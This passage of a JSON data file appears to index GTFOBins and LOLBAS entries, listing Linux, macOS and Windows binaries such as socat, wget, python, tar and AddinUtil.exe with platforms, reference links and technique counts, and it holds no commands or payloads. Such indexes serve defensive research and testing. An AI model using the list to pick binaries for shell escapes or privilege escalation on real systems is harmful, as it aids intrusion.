aliases":[],"references":["https://gtfobins.github.io/gtfobins/pexec/"],"count":3},{"id":"gtfo:pg","name":"pg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pg/"],"count":6},{"id":"gtfo:php","name":"php","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/php/"],"count":40},{"id":"gtfo:pic","name":"pic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pic/"],"count":6},{"id":"gtfo:pidstat","name":"pidstat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pidstat/"],"count":3},{"id":"gtfo:pip","name":"pip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pip/"],"count":4},{"id":"gtfo:pipx","name":"pipx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pipx/"],"count":2},{"id":"gtfo:pkexec","name":"pkexec","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pkexec/"],"count":1},{"id":"gtfo:pkg","name":"pkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pkg/"],"count":1},{"id":"gtfo:plymouth","name":"plymouth","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/plymouth/"],"count":3},{"id":"gtfo:podman","name":"podman","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/podman/"],"count":2},{"id":"gtfo:poetry","name":"poetry","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/poetry/"],"count":2},{"id":"gtfo:posh","name":"posh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/posh/"],"count":2},{"id":"gtfo:pr","name":"pr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pr/"],"count":3},{"id":"gtfo:procmail","name":"procmail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/procmail/"],"count":2},{"id":"gtfo:pry","name":"pry","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pry/"],"count":2},{"id":"gtfo:psftp","name":"psftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/psftp/"],"count":3},{"id":"gtfo:psql","name":"psql","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/psql/"],"count":6},{"id":"gtfo:ptx","name":"ptx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ptx/"],"count":3},{"id":"gtfo:puppet","name":"puppet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/puppet/"],"count":6},{"id":"gtfo:pwsh","name":"pwsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pwsh/"],"count":4},{"id":"gtfo:pygmentize","name":"pygmentize","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pygmentize/"],"count":2},{"id":"gtfo:pyright","name":"pyright","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pyright/"],"count":6},{"id":"gtfo:python","name":"python","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/python/"],"count":26},{"id":"gtfo:qpdf","name":"qpdf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/qpdf/"],"count":3},{"id":"gtfo:rake","name":"rake","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rake/"],"count":4},{"id":"gtfo:ranger","name":"ranger","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ranger/"],"count":2},{"id":"gtfo:rc","name":"rc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rc/"],"count":3},{"id":"gtfo:readelf","name":"readelf","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/readelf/"],"count":3},{"id":"gtfo:redcarpet","name":"redcarpet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/redcarpet/"],"count":2},{"id":"gtfo:redis","name":"redis","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/redis/"],"count":3},{"id":"gtfo:restic","name":"restic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/restic/"],"count":15},{"id":"gtfo:rev","name":"rev","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rev/"],"count":3},{"id":"gtfo:rlogin","name":"rlogin","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rlogin/"],"count":3},{"id":"gtfo:rlwrap","name":"rlwrap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"count":6},{"id":"gtfo:rpm","name":"rpm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpm/"],"count":10},{"id":"gtfo:rpmdb","name":"rpmdb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"count":6},{"id":"gtfo:rpmquery","name":"rpmquery","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"count":6},{"id":"gtfo:rpmverify","name":"rpmverify","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"count":6},{"id":"gtfo:rsync","name":"rsync","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rsync/"],"count":3},{"id":"gtfo:rsyslogd","name":"rsyslogd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rsyslogd/"],"count":1},{"id":"gtfo:rtorrent","name":"rtorrent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"count":3},{"id":"gtfo:ruby","name":"ruby","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ruby/"],"count":15},{"id":"gtfo:run-mailcap","name":"run-mailcap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"count":4},{"id":"gtfo:run-parts","name":"run-parts","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/run-parts/"],"count":6},{"id":"gtfo:runscript","name":"runscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/runscript/"],"count":3},{"id":"gtfo:rustc","name":"rustc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustc/"],"count":6},{"id":"gtfo:rustdoc","name":"rustdoc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"count":4},{"id":"gtfo:rustfmt","name":"rustfmt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustfmt/"],"count":2},{"id":"gtfo:rustup","name":"rustup","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustup/"],"count":4},{"id":"gtfo:sash","name":"sash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sash/"],"count":3},{"id":"gtfo:scanmem","name":"scanmem","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scanmem/"],"count":3},{"id":"gtfo:scp","name":"scp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scp/"],"count":12},{"id":"gtfo:screen","name":"screen","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/screen/"],"count":6},{"id":"gtfo:script","name":"script","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/script/"],"count":6},{"id":"gtfo:scrot","name":"scrot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scrot/"],"count":3},{"id":"gtfo:sed","name":"sed","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sed/"],"count":12},{"id":"gtfo:service","name":"service","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/service/"],"count":2},{"id":"gtfo:setarch","name":"setarch","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setarch/"],"count":3},{"id":"gtfo:setcap","name":"setcap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setcap/"],"count":2},{"id":"gtfo:setfacl","name":"setfacl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setfacl/"],"count":2},{"id":"gtfo:setlock","name":"setlock","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setlock/"],"count":3},{"id":"gtfo:sftp","name":"sftp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sftp/"],"count":9},{"id":"gtfo:sg","name":"sg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sg/"],"count":2},{"id":"gtfo:shred","name":"shred","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/shred/"],"count":3},{"id":"gtfo:shuf","name":"shuf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/shuf/"],"count":6},{"id":"gtfo:slsh","name":"slsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/slsh/"],"count":3},{"id":"gtfo:smbclient","name":"smbclient","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/smbclient/"],"count":6},{"id":"gtfo:snap","name":"snap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/snap/"],"count":1},{"id":"gtfo:socat","name":"socat","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/socat/"],"count":21},{"id":"gtfo:socket","name":"socket","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/socket/"],"count":6},{"id":"gtfo:soelim","name":"soelim","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/soelim/"],"count":3},{"id":"gtfo:softlimit","name":"softlimit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/softlimit/"],"count":3},{"id":"gtfo:sort","name":"sort","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sort/"],"count":6},{"id":"gtfo:split","name":"split","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/split/"],"count":9},{"id":"gtfo:sqlite3","name":"sqlite3","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"count":9},{"id":"gtfo:sqlmap","name":"sqlmap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sqlmap/"],"count":2},{"id":"gtfo:ss","name":"ss","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ss/"],"count":3},{"id":"gtfo:ssh","name":"ssh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh/"],"count":16},{"id":"gtfo:ssh-agent","name":"ssh-agent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"count":3},{"id":"gtfo:ssh-copy-id","name":"ssh-copy-id","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"count":4},{"id":"gtfo:ssh-keygen","name":"ssh-keygen","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"count":3},{"id":"gtfo:ssh-keyscan","name":"ssh-keyscan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"count":3},{"id":"gtfo:sshfs","name":"sshfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshfs/"],"count":6},{"id":"gtfo:sshpass","name":"sshpass","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshpass/"],"count":3},{"id":"gtfo:sshuttle","name":"sshuttle","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshuttle/"],"count":1},{"id":"gtfo:start-stop-daemon","name":"start-stop-daemon","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"count":3},{"id":"gtfo:stdbuf","name":"stdbuf","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"count":3},{"id":"gtfo:strace","name":"strace","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/strace/"],"count":5},{"id":"gtfo:strings","name":"strings","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/strings/"],"count":3},{"id":"gtfo:su","name":"su","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/su/"],"count":1},{"id":"gtfo:sudo","name":"sudo","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sudo/"],"count":1},{"id":"gtfo:sysctl","name":"sysctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sysctl/"],"count":5},{"id":"gtfo:systemctl","name":"systemctl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemctl/"],"count":6},{"id":"gtfo:systemd-resolve","name":"systemd-resolve","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemd-resolve/"],"count":1},{"id":"gtfo:systemd-run","name":"systemd-run","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"count":3},{"id":"gtfo:tac","name":"tac","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tac/"],"count":3},{"id":"gtfo:tail","name":"tail","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tail/"],"count":3},{"id":"gtfo:tailscale","name":"tailscale","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tailscale/"],"count":1},{"id":"gtfo:tar","name":"tar","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tar/"],"count":21},{"id":"gtfo:task","name":"task","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/task/"],"count":3},{"id":"gtfo:taskset","name":"taskset","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/taskset/"],"count":2},{"id":"gtfo:tasksh","name":"tasksh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tasksh/"],"count":3},{"id":"gtfo:tbl","name":"tbl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tbl/"],"count":3},{"id":"gtfo:tclsh","name":"tclsh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tclsh/"],"count":10},{"id":"gtfo:tcpdump","name":"tcpdump","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"count":7},{"id":"gtfo:tcsh","name":"tcsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tcsh/"],"count":6},{"id":"gtfo:tdbtool","name":"tdbtool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"count":3},{"id":"gtfo:tee","name":"tee","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tee/"],"count":3},{"id":"gtfo:telnet","name":"telnet","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/telnet/"],"count":6},{"id":"gtfo:terraform","name":"terraform","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/terraform/"],"count":3},{"id":"gtfo:tex","name":"tex","source":"GTFOBins","platform":["Linux"],"aliases":["xetex"],"references":["https://gtfobins.github.io/gtfobins/tex/"],"count":3},{"id":"gtfo:tftp","name":"tftp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tftp/"],"count":6},{"id":"gtfo:tic","name":"tic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tic/"],"count":3},{"id":"gtfo:time","name":"time","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/time/"],"count":3},{"id":"gtfo:timedatectl","name":"timedatectl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/timedatectl/"],"count":2},{"id":"gtfo:timeout","name":"timeout","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/timeout/"],"count":3},{"id":"gtfo:tmate","name":"tmate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tmate/"],"count":3},{"id":"gtfo:tmux","name":"tmux","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tmux/"],"count":9},{"id":"gtfo:top","name":"top","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/top/"],"count":2},{"id":"gtfo:torify","name":"torify","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/torify/"],"count":2},{"id":"gtfo:torsocks","name":"torsocks","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/torsocks/"],"count":2},{"id":"gtfo:troff","name":"troff","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/troff/"],"count":3},{"id":"gtfo:tsc","name":"tsc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tsc/"],"count":4},{"id":"gtfo:tshark","name":"tshark","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tshark/"],"count":2},{"id":"gtfo:ul","name":"ul","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ul/"],"count":3},{"id":"gtfo:unexpand","name":"unexpand","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unexpand/"],"count":3},{"id":"gtfo:uniq","name":"uniq","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uniq/"],"count":3},{"id":"gtfo:unshare","name":"unshare","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unshare/"],"count":3},{"id":"gtfo:unsquashfs","name":"unsquashfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unsquashfs/"],"count":2},{"id":"gtfo:unzip","name":"unzip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unzip/"],"count":2},{"id":"gtfo:update-alternatives","name":"update-alternatives","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/update-alternatives/"],"count":2},{"id":"gtfo:urlget","name":"urlget","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/urlget/"],"count":3},{"id":"gtfo:uuencode","name":"uuencode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uuencode/"],"count":3},{"id":"gtfo:uv","name":"uv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uv/"],"count":2},{"id":"gtfo:vagrant","name":"vagrant","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vagrant/"],"count":2},{"id":"gtfo:valgrind","name":"valgrind","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/valgrind/"],"count":2},{"id":"gtfo:varnishncsa","name":"varnishncsa","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/varnishncsa/"],"count":2},{"id":"gtfo:vi","name":"vi","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vi/"],"count":18},{"id":"gtfo:vigr","name":"vigr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vigr/"],"count":2},{"id":"gtfo:vim","name":"vim","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["nvim","rvim","view","vimdiff"],"references":["https://gtfobins.github.io/gtfobins/vim/"],"count":12},{"id":"gtfo:vipw","name":"vipw","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vipw/"],"count":2},{"id":"gtfo:virsh","name":"virsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/virsh/"],"count":5},{"id":"gtfo:volatility","name":"volatility","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/volatility/"],"count":3},{"id":"gtfo:w3m","name":"w3m","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/w3m/"],"count":3},{"id":"gtfo:wall","name":"wall","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wall/"],"count":1},{"id":"gtfo:watch","name":"watch","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/watch/"],"count":6},{"id":"gtfo:wc","name":"wc","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wc/"],"count":3},{"id":"gtfo:wg-quick","name":"wg-quick","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wg-quick/"],"count":1},{"id":"gtfo:wget","name":"wget","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wget/"],"count":18},{"id":"gtfo:whiptail","name":"whiptail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/whiptail/"],"count":3},{"id":"gtfo:whois","name":"whois","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/whois/"],"count":6},{"id":"gtfo:wireshark","name":"wireshark","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wireshark/"],"count":4},{"id":"gtfo:wish","name":"wish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wish/"],"count":3},{"id":"gtfo:xargs","name":"xargs","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xargs/"],"count":12},{"id":"gtfo:xdg-user-dir","name":"xdg-user-dir","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"],"count":2},{"id":"gtfo:xdotool","name":"xdotool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xdotool/"],"count":3},{"id":"gtfo:xmodmap","name":"xmodmap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"count":3},{"id":"gtfo:xmore","name":"xmore","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xmore/"],"count":3},{"id":"gtfo:xpad","name":"xpad","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xpad/"],"count":3},{"id":"gtfo:xxd","name":"xxd","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xxd/"],"count":6},{"id":"gtfo:xz","name":"xz","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xz/"],"count":3},{"id":"gtfo:yarn","name":"yarn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yarn/"],"count":6},{"id":"gtfo:yash","name":"yash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yash/"],"count":3},{"id":"gtfo:yelp","name":"yelp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yelp/"],"count":2},{"id":"gtfo:yt-dlp","name":"yt-dlp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yt-dlp/"],"count":2},{"id":"gtfo:yum","name":"yum","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yum/"],"count":3},{"id":"gtfo:zathura","name":"zathura","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zathura/"],"count":2},{"id":"gtfo:zcat","name":"zcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zcat/"],"count":2},{"id":"gtfo:zgrep","name":"zgrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zgrep/"],"count":2},{"id":"gtfo:zic","name":"zic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zic/"],"count":3},{"id":"gtfo:zip","name":"zip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zip/"],"count":6},{"id":"gtfo:zless","name":"zless","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zless/"],"count":3},{"id":"gtfo:zsh","name":"zsh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zsh/"],"count":24},{"id":"gtfo:zsoelim","name":"zsoelim","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"count":3},{"id":"gtfo:zypper","name":"zypper","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zypper/"],"count":4},{"id":"lolbas:addinutil-exe","name":"AddinUtil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\AddInUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\AddInUtil.exe"],"author":"Michael McKinley @MckinleyMike","created":"2023-10-05T00:00:00.000Z","contributors":["Michael McKinley @MckinleyMike","Tony Latteri @TheLatteri"],"references":["https://lolbas-project.github.io/lolbas/Binaries/AddinUtil/"],"count":1},{"id":"lolbas:appinstaller-exe","name":"AppInstaller.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"],"author":"Wade Hickey","created":"2020-12-02T00:00:00.000Z","contributors":["Wade Hickey 